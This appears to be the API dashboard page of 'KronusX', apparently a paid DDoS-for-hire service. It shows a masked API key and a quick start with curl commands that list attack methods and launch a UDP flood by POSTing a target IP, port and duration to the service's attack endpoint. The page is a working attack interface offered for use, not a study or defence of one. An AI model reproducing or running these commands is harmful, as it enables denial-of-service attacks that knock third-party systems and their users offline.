Your active key

Use this key to authenticate REST API requests. Keep it private — anyone with this key can launch attacks on your account.

••••••••••••••••

Quick start

Get started with the KronusX REST API.

# List available methods
curl https://kronusx.xyz/api/methods.php

# Launch an attack (POST)
curl -X POST https://kronusx.xyz/api/attack.php \
  -H "Content-Type: application/json" \
  -d '{"target":"1.2.3.4","port":80,"duration":60,"method":"udp"}'
View full documentation